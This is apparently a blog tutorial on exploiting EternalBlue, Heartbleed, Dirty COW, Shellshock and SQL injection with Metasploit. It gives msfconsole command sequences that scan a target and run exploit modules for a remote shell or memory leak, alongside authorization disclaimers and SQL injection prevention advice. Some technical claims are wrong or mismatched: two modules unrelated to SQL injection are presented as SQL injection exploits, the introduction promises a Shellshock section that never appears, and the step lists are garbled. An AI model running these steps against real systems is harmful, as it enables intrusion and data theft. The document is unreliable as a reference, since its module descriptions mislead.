A Step-by-Step Guide to Exploiting Known Vulnerabilities with Metasploit

3/21/202411 min read

yellow and black sunflower illustration
yellow and black sunflower illustration

In this guide, we will focus on three specific vulnerabilities that are commonly targeted by cybercriminals: the EternalBlue exploit, the Heartbleed vulnerability, and the Shellshock vulnerability. These vulnerabilities have been widely exploited in the past and have caused significant damage to organizations worldwide.

The first vulnerability we will explore is the EternalBlue exploit. This vulnerability was discovered by the National Security Agency (NSA) and was leaked by a group of hackers known as The Shadow Brokers in 2017. The EternalBlue exploit takes advantage of a vulnerability in the Windows operating system's Server Message Block (SMB) protocol. By exploiting this vulnerability, an attacker can gain remote code execution on a target system, allowing them to take control of the system and execute malicious commands.

The second vulnerability we will cover is the Heartbleed vulnerability. Heartbleed is a security bug in the OpenSSL cryptography library, which is widely used to secure web communications. This vulnerability allows an attacker to read sensitive information from the memory of a target system. By exploiting Heartbleed, an attacker can potentially access usernames, passwords, and other confidential data, compromising the security of the affected system.

The third vulnerability we will discuss is the Shellshock vulnerability. Shellshock is a vulnerability in the Bash shell, which is a command-line interpreter used in many Unix-based operating systems. This vulnerability allows an attacker to execute arbitrary commands on a target system by manipulating environment variables. Shellshock was widely exploited in 2014 and affected millions of systems worldwide.

Throughout this guide, we will provide step-by-step instructions on how to set up a virtual lab environment, install and configure Metasploit, and exploit each of these vulnerabilities. It is important to note that this guide is intended for educational purposes only. It is crucial to obtain proper authorization before conducting any penetration testing activities on live systems.

Now that we have an overview of the vulnerabilities we will be exploring and the importance of proper authorization, let's move on to setting up our virtual lab environment.

Metasploit is an incredibly powerful and versatile tool that has become the go-to framework for many cybersecurity professionals. It offers a wide range of capabilities that allow for comprehensive testing and analysis of systems and networks. Whether you are a penetration tester, a vulnerability analyst, or an exploit developer, Metasploit provides the necessary tools to effectively assess and secure your target.

The exploits module is one of the key components of Metasploit. It contains a vast collection of pre-built exploits that can be used to target specific vulnerabilities in various software and operating systems. These exploits are meticulously crafted to take advantage of specific weaknesses, allowing the user to gain unauthorized access to the target system. The module also provides the ability to customize and modify existing exploits or create new ones from scratch, giving users the flexibility to adapt to different scenarios.

Another essential module is the payloads module. This module is responsible for delivering the desired outcome once an exploit is successfully executed. It includes a wide range of payloads, such as remote shells, meterpreter sessions, and various post-exploitation functionalities. These payloads give the user complete control over the compromised system, allowing for further exploration, data extraction, or even the installation of backdoors for future access.

In addition to exploits and payloads, Metasploit also offers auxiliary modules. These modules are designed to perform specific tasks that support the overall penetration testing process. They can be used to gather information about the target system, scan for vulnerabilities, or even launch denial-of-service attacks. Auxiliary modules provide valuable insights into the target environment and help identify potential weaknesses that can be exploited.

Once a system has been compromised, the post-exploitation modules come into play. These modules enable the user to carry out further actions on the compromised system, such as privilege escalation, lateral movement, or data exfiltration. They provide a comprehensive set of tools and functionalities to ensure maximum control and persistence within the target environment.

Metasploit's open-source nature has allowed it to evolve and improve over the years. Its active community of contributors continuously updates and adds new features to the framework, ensuring its relevance in an ever-changing cybersecurity landscape. With its extensive collection of exploits, payloads, and modules, Metasploit has become an indispensable tool for both offensive and defensive security professionals.

Step 1: Installing Metasploit

The first step is to install Metasploit on your system. Metasploit is available for different operating systems, including Windows, Linux, and macOS. You can download the installer or follow the installation instructions from the official Metasploit website. Once you have installed Metasploit, you can launch it from the command line or use the graphical user interface (GUI) provided by the framework.

When installing Metasploit on Windows, you can simply download the installer package from the website and run it. The installer will guide you through the installation process, allowing you to choose the desired installation location and any additional components you may want to include. Once the installation is complete, you can access Metasploit from the Start menu or by running the 'msfconsole' command in the command prompt.

For Linux users, Metasploit can be installed using package managers such as apt or yum. The exact installation command may vary depending on the Linux distribution you are using. For example, on Ubuntu, you can install Metasploit by running the following command in the terminal:

sudo apt-get install metasploit-framework

After the installation is complete, you can launch Metasploit by running the 'msfconsole' command in the terminal. You may also want to set up the Metasploit database by running the 'msfdb init' command, which will initialize the PostgreSQL database used by Metasploit for storing exploit data and session information.

Mac users can install Metasploit using the Homebrew package manager. First, you need to install Homebrew if you haven't already. Open the Terminal and run the following command:

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

Once Homebrew is installed, you can install Metasploit by running the following command:

brew install metasploit-framework

After the installation is complete, you can launch Metasploit by running the 'msfconsole' command in the Terminal.

Regardless of the operating system you are using, it is recommended to keep Metasploit up to date by regularly checking for updates and applying them as necessary. This will ensure that you have the latest features and security fixes.

Step 2: Scanning for Vulnerabilities

Before we can exploit any vulnerabilities, we need to scan our target system to identify potential weaknesses. Metasploit provides several scanning modules that can be used for this purpose. One of the most commonly used scanning modules is the "nmap" module, which integrates the popular Nmap scanning tool with Metasploit.

To scan a target system using the "nmap" module, use the following command:

msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS <target_ip_address>
msf5 auxiliary(scanner/portscan/tcp) > run

This will scan the target system for open TCP ports. Once the scan is complete, you will have a list of open ports that can be further analyzed for potential vulnerabilities.

After obtaining the list of open ports, the next step is to conduct a more detailed vulnerability scan on each of these ports. Metasploit offers a wide range of scanning modules that can be used to identify vulnerabilities in various services and protocols.

For example, if port 80 (HTTP) is open, you can use the "http_version" module to determine the version of the web server running on that port. This information can be valuable in identifying known vulnerabilities associated with that particular version.

Similarly, if port 22 (SSH) is open, you can use the "ssh_version" module to determine the SSH server version and check if it is vulnerable to any known exploits.

It is important to note that vulnerability scanning should always be performed with proper authorization and in a controlled environment. Unauthorized scanning of systems can lead to legal consequences and is considered unethical.

Once the vulnerability scan is complete, you will have a better understanding of the potential weaknesses in the target system. This information can then be used to select and execute appropriate exploits to gain unauthorized access or perform other malicious activities.

Step 3: Exploiting Known Vulnerabilities

Now that we have identified potential vulnerabilities, we can proceed to exploit them using Metasploit. Metasploit provides a wide range of exploits for different vulnerabilities, including remote code execution, privilege escalation, and web application vulnerabilities.

Let's explore three of the most well-known vulnerabilities and how to exploit them using Metasploit:

1. Remote Code Execution

Remote code execution (RCE) vulnerabilities allow an attacker to execute arbitrary code on a remote system. These vulnerabilities are often found in web applications that do not properly validate user input. One such vulnerability is the infamous "Shellshock" vulnerability, which affected the Bash shell.

To exploit this vulnerability using Metasploit, we can use the "exploit/multi/http/apache_mod_cgi_bash_env_exec" module. This module leverages the Shellshock vulnerability to execute arbitrary commands on the target system. By providing a malicious payload, we can gain remote access to the system and execute commands as if we were sitting in front of it.

2. Privilege Escalation

Privilege escalation vulnerabilities allow an attacker to elevate their privileges on a compromised system. These vulnerabilities are often found in operating systems or software that have not been properly patched or configured. One well-known privilege escalation vulnerability is the "Dirty COW" vulnerability, which affected the Linux kernel.

To exploit this vulnerability using Metasploit, we can use the "exploit/linux/local/dirtycow" module. This module leverages the Dirty COW vulnerability to gain root privileges on the target system. With root access, we have full control over the system and can perform any actions we desire.

3. Web Application Vulnerabilities

Web application vulnerabilities are a common target for attackers, as they can provide access to sensitive data or allow for remote code execution. One such vulnerability is the "SQL Injection" vulnerability, which allows an attacker to manipulate a web application's database by injecting malicious SQL queries.

To exploit this vulnerability using Metasploit, we can use the "exploit/multi/http/php_cgi_arg_injection" module. This module leverages a PHP CGI argument injection vulnerability to execute arbitrary commands on the target system. By injecting a malicious SQL query, we can extract or modify data in the web application's database.

These are just three examples of the many vulnerabilities that can be exploited using Metasploit. It is important to note that while Metasploit is a powerful tool for testing and demonstrating vulnerabilities, it should only be used in a legal and ethical manner. Always ensure that you have proper authorization before conducting any security testing or exploitation.

1. EternalBlue (CVE-2017-0144)

EternalBlue is an exploit developed by the NSA and leaked by the hacker group known as the Shadow Brokers. It targets a vulnerability in the Windows Server Message Block (SMB) protocol, allowing remote code execution on vulnerable systems.

To exploit the EternalBlue vulnerability using Metasploit, use the following steps:

  1. Search for the EternalBlue exploit module:
    2. msf5 > search EternalBlue
  2. Select the appropriate exploit module:
    3. msf5 > use exploit/windows/smb/ms17_010_eternalblue
  3. Set the required options:
    4. msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <target_ip_address>
  4. Run the exploit:
    5. msf5 exploit(windows/smb/ms17_010_eternalblue) > run

If successful, this exploit will provide you with a remote shell on the target system, allowing you to execute commands and gain control over the system.

Exploits like EternalBlue highlight the importance of regularly patching and updating systems to protect against known vulnerabilities. In the case of EternalBlue, Microsoft released a security patch (MS17-010) to address the vulnerability shortly after its discovery. However, many organizations failed to apply the patch in a timely manner, leaving their systems exposed to potential attacks. The impact of EternalBlue was significant, as it was weaponized by various threat actors, including the notorious WannaCry ransomware attack in 2017. WannaCry spread rapidly across the globe, infecting hundreds of thousands of systems and causing widespread disruption. The exploit was also utilized by other malware campaigns, such as NotPetya, which targeted organizations in Ukraine and caused significant financial losses. The lesson learned from EternalBlue is that even sophisticated exploits developed by intelligence agencies can fall into the wrong hands and be used for malicious purposes. It emphasizes the need for robust cybersecurity practices, including regular patching, network segmentation, and user awareness training. In addition to patching, organizations should also consider implementing intrusion detection and prevention systems (IDS/IPS) to detect and block attempts to exploit known vulnerabilities. These systems can analyze network traffic and identify suspicious behavior, providing an additional layer of defense against potential attacks. Furthermore, organizations should conduct regular vulnerability assessments and penetration testing to identify and address any weaknesses in their systems. These proactive measures can help identify vulnerabilities before they are exploited by threat actors, allowing organizations to take appropriate remediation steps. Overall, the EternalBlue exploit serves as a reminder of the evolving threat landscape and the importance of proactive cybersecurity measures. By staying vigilant and implementing best practices, organizations can significantly reduce their risk of falling victim to exploits like EternalBlue and the devastating consequences they can bring.

2. Heartbleed (CVE-2014-0160)

Heartbleed is a vulnerability in the OpenSSL cryptographic software library that allows an attacker to retrieve sensitive information from the memory of a vulnerable server. It was discovered in 2014 and affects a large number of websites and servers.

To exploit the Heartbleed vulnerability using Metasploit, follow these steps:

  1. Search for the Heartbleed exploit module:
    2. msf5 > search Heartbleed
  2. Select the appropriate exploit module:
    3. msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
  3. Set the required options:
    4. msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set RHOSTS <target_ip_address>
  4. Run the exploit:
    5. msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run

If the target server is vulnerable to Heartbleed, this exploit will retrieve sensitive information, such as private keys and user credentials, from the server's memory.

The Heartbleed vulnerability was a significant security flaw that sent shockwaves through the internet community when it was discovered in 2014. It affected the OpenSSL cryptographic software library, which is widely used to secure communication between websites and servers. The vulnerability allowed attackers to exploit a flaw in the implementation of the Transport Layer Security (TLS) heartbeat extension, which is used to keep connections alive. When a vulnerable server received a malformed heartbeat request, it would respond by sending back a chunk of its memory. This response could include sensitive information such as private keys, user credentials, and other data stored in the server's memory. The attacker could then analyze this information to gain unauthorized access to the server or steal sensitive data. The impact of the Heartbleed vulnerability was widespread. It affected a large number of websites and servers, including popular services like Yahoo, Google, and Facebook. The discovery of Heartbleed prompted a scramble to patch vulnerable systems and change passwords to protect against potential attacks. To exploit the Heartbleed vulnerability using Metasploit, a powerful penetration testing framework, several steps are required. First, the user needs to search for the Heartbleed exploit module within Metasploit's extensive library of exploits. Once the appropriate module is selected, the user can set the required options, such as the target IP address. Finally, running the exploit will attempt to retrieve sensitive information from the target server's memory. It is crucial to note that the Heartbleed vulnerability has been patched since its discovery. However, it serves as a reminder of the importance of regularly updating software and implementing robust security measures to protect against emerging threats. Organizations and individuals must remain vigilant and proactive in their approach to cybersecurity to mitigate the risk of similar vulnerabilities in the future.

3. SQL Injection

SQL Injection is a common web application vulnerability that allows an attacker to manipulate the database queries executed by a web application. It can lead to unauthorized access, data leakage, and even complete compromise of the target system.

To exploit a SQL Injection vulnerability using Metasploit, follow these steps:

  1. Search for SQL Injection exploit modules:
    2. msf5 > search sql injection
  2. Select the appropriate exploit module:
    3. msf5 > use exploit/multi/http/phpmyadmin_preg_replace
  3. Set the required options:
    4. msf5 exploit(multi/http/phpmyadmin_preg_replace) > set RHOSTS <target_ip_address>
  4. Run the exploit:
    5. msf5 exploit(multi/http/phpmyadmin_preg_replace) > run

If the target web application is vulnerable to SQL Injection, this exploit will allow you to execute arbitrary SQL queries and potentially gain unauthorized access to the underlying database.

Preventing SQL Injection Attacks

SQL Injection attacks can have devastating consequences, but there are several measures you can take to prevent them:

  1. Input Validation: Implement strict input validation to ensure that user-supplied data is properly sanitized and validated before being used in SQL queries. This can include techniques such as parameterized queries, stored procedures, and input filtering.
  2. Least Privilege: Follow the principle of least privilege when setting up database user accounts. Each account should only have the necessary privileges to perform its specific tasks, reducing the potential impact of a successful SQL Injection attack.
  3. Web Application Firewalls (WAFs): Implement a WAF that can detect and block SQL Injection attempts. WAFs can analyze incoming requests and block those that exhibit suspicious behavior or contain known SQL Injection patterns.
  4. Regular Patching and Updates: Keep your web application and database management system up to date with the latest security patches and updates. Vulnerabilities that can be exploited for SQL Injection attacks are often patched by vendors.
  5. Security Audits and Penetration Testing: Regularly conduct security audits and penetration testing to identify and address any vulnerabilities in your web application. This can help uncover potential SQL Injection vulnerabilities and allow you to remediate them before they can be exploited.

By implementing these preventive measures, you can significantly reduce the risk of SQL Injection attacks and protect your web application and database from unauthorized access and data leakage.